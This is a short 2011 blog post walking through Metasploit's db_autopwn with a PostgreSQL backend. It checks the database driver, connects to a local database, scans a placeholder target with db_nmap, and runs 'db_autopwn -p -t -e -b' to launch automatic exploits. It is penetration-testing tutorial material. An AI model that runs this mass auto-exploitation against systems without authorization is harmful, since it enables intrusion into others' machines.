Friday, May 6, 2011

Metasploit db_autopwn (Postgres)

Step 1: Get/view active database driver.
msf exploit(psexec) > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql

[*] DB Support: Enable the mysql driver with the following command:
[*] $ gem install mysql
[*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*] $ sudo apt-get install libmysqlclient-dev

Step 2: Connect to the local database.
msf exploit(psexec) > db_connect postgres@localhost
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE: CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"

...

Step 3: nmap, enumerate the services of target system(s)
msf exploit(psexec) > db_nmap [target]
[*] Nmap: Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-06 15:55 EDT
[*] Nmap: Nmap scan report for [target])
[*] Nmap: Host is up (0.021s latency).
[*] Nmap: Not shown: 995 filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 25/tcp open smtp
[*] Nmap: 110/tcp open pop3
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps

Step 4: auto exploit
msf exploit(psexec) > db_autopwn -p -t -e -b



No comments:

Post a Comment